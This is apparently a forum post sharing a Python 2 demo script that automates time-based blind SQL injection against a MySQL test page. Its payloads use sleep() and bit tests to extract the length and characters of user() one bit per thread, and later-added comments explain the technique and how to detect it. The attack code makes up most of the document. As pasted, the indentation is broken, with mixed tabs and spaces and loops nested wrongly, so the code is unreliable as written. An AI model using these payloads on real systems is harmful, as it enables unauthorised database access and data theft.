python blind_injection.py demo for mysql

之前某人分享过判断二进制0/1来盲注,现在用python写了个demo

import urllib
import urllib2
import time
import threading
 
 
class blind_injection:
    """Time-based blind SQL injection demo against a MySQL-backed test page (Python 2).

    Every request embeds an ``if(<bit test>, sleep(2), 0)`` condition in the
    ``test`` query parameter of ``testmysql.php`` on 10.211.55.20 (an RFC 1918
    address, i.e. the author's own lab host). ``_request`` uses a 2-second client
    timeout, so a reply of ``'timeout'`` is read as bit 1 and any real body as
    bit 0. The 8 bits of ``length(user())`` and then of each character of
    ``user()`` are fetched one per worker thread and reassembled by ``bin2dec``.

    Defensive notes: the presumable root cause is string-built SQL behind the
    target script; parameterised queries remove the issue entirely. On the wire
    the technique is conspicuous: bursts of near-identical requests to one
    endpoint whose query strings carry ``sleep(``, ``lpad(bin(``, ``mid(`` and a
    trailing ``%23`` (``#`` comment terminator), with many responses taking
    ~2 s or timing out. Logging those request patterns and alerting on
    ``sleep``/``benchmark`` in parameters is a cheap detection.
    """
    # thread_num: number of worker threads, also the number of bits (8) read
    # per value. thread_count is the shared countdown the workers decrement;
    # res / resdata collect one bit per worker, keyed by the bit position as a
    # string; tmp accumulates the bit string between rounds.
    def __init__(self,thread_num):
        	self.thread_count=self.thread_num=thread_num
        	self.lock=threading.Lock()
        		self.res={}
        		self.resdata={}
		        self.tmp=''
    # Fetch URL with a fixed desktop User-Agent and a 2-second timeout.
    # Returns the response body, or the literal string 'timeout' when urlopen
    # raises. Note that *any* exception (connection refused, HTTP error, ...)
    # takes that path, not only a socket timeout, so a network error is
    # recorded exactly like the injected sleep(2) signal. The 2 s timeout is
    # the same value as the sleep(2) in the payloads of _getlength/_getdata.
    def _request(self,URL):
        		user_agent = { 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10' }
		        req = urllib2.Request(URL, None, user_agent)
        		try:
			            request=urllib2.urlopen(req,timeout=2)
        		    except Exception ,e:
			            #time.sleep(0.01)
			            return 'timeout'
		    return request.read()
 
    # Parse a string of '0'/'1' characters as a base-2 integer.
    def bin2dec(self,string_num):
        	return int(string_num,2)
 
 
 
    # Worker: recover bit (ii+1) of the 8-bit zero-padded binary form of
    # length(user()). The payload makes MySQL sleep(2) when that bit is 1; a
    # 'timeout' reply is stored as 1 in self.res[str(ii+1)], anything else as 0.
    # thread_id is read from the thread name but never used. Only the countdown
    # decrement is guarded by self.lock; the dict write is not, but each worker
    # writes its own key (ii differs per thread, see run).
    def _getlength(self,ii):
        	thread_id=int(threading.currentThread().getName())
        	ii=ii+1
        	url="http://10.211.55.20/testmysql.php?test=1'%20and%20if(mid(lpad(bin(length(user())),8,0),"+str(ii)+",1)=1,sleep(2),0)%23"
        	html=self._request(url)
        	#print html
        	verify = 'timeout'
        	if verify not in html:
        	    self.res[str(ii)] = 0
		else:
        	    self.res[str(ii)] = 1
        	self.lock.acquire()
        	self.thread_count-=1
        	self.lock.release()
 
    # Worker: recover bit j of the 8-bit binary form of ord(mid(user(), x, 1)),
    # i.e. bit j of the x-th character of user(). Same timeout-as-1 decoding as
    # _getlength; the result goes to self.resdata[str(j)]. The payload here is
    # the same shape as in _getlength but fully URL-encoded.
    def _getdata(self,j,x):
        	url="http://10.211.55.20/testmysql.php?test=1'%20and+if%281=%28mid%28lpad%28bin%28ord%28mid%28%28select%20user()%29," + str(x) + ",1%29%29%29,8,0%29,"+ str(j) + ",1%29%29,sleep%282%29,0%29%23"
        	html=self._request(url)
        	#print url
        	#print html
        	verify = 'timeout'
        	if verify not in html:
        	    self.resdata[str(j)] = 0
		else:
        	    self.resdata[str(j)] = 1
        	self.lock.acquire()
        	self.thread_count-=1
        	self.lock.release()
 
 
    # Recover the characters of user() one at a time. For each 1-based position
    # x: reset the countdown to 8 (hard-coded, not self.thread_num), start one
    # _getdata thread per bit, wait for the countdown, join resdata['1'..'8']
    # into a bit string, and append chr(bin2dec(bits)) to self.data, printing
    # the partial result after every character. Requires self.datalength,
    # which run() sets first.
    # NOTE(review): as pasted, the wait loop and the byte assembly are indented
    # inside the per-bit thread-start loop; the paste mixes tabs and spaces, so
    # the author's original layout cannot be recovered from this page.
    def _getstep(self):
        	self.data=''
        	for x in range(self.datalength):
        	    x=x+1
        	    self.thread_count=8
        	    self.tmp=''
        	    for j in range(self.thread_num):
        	        j=j+1
        	        t=threading.Thread(target=self._getdata,name=str(j),args=(j,x))
        	        t.setDaemon(True)
        	        t.start()
        	        while self.thread_count>0:
        	            time.sleep(0.01)
        	        for i in range(8):
        	            self.tmp=self.tmp+str(self.resdata[str(i+1)])
        	        self.data=self.data+chr(self.bin2dec(self.tmp))
        	    print self.data
 
 
 
 
    # Entry point: start one _getlength daemon thread per bit (thread name
    # str(i), argument i), wait for the shared countdown to reach zero, join
    # res['1'..'8'] into self.datalength via bin2dec, print it, then call
    # _getstep to read the characters. Same layout caveat as _getstep: as
    # pasted, the wait and the assembly sit inside the thread-start loop.
    # Python 2 print statements throughout.
    def run(self):
        for i in range(self.thread_num):
            t=threading.Thread(target=self._getlength,name=str(i),args=(i,))
            t.setDaemon(True)
            t.start()
            while self.thread_count>0:
                time.sleep(0.01)
            for i in range(8):
                self.tmp = self.tmp + str(self.res[str(i+1)]) 
            self.datalength=self.bin2dec(self.tmp)
            print 'length:'+ str(self.datalength)
            self._getstep()
 
 
if __name__=='__main__':
    # Script entry: build the demo runner with eight worker threads
    # (one per bit of each recovered byte) and start it.
    blind_injection(thread_num=8).run()
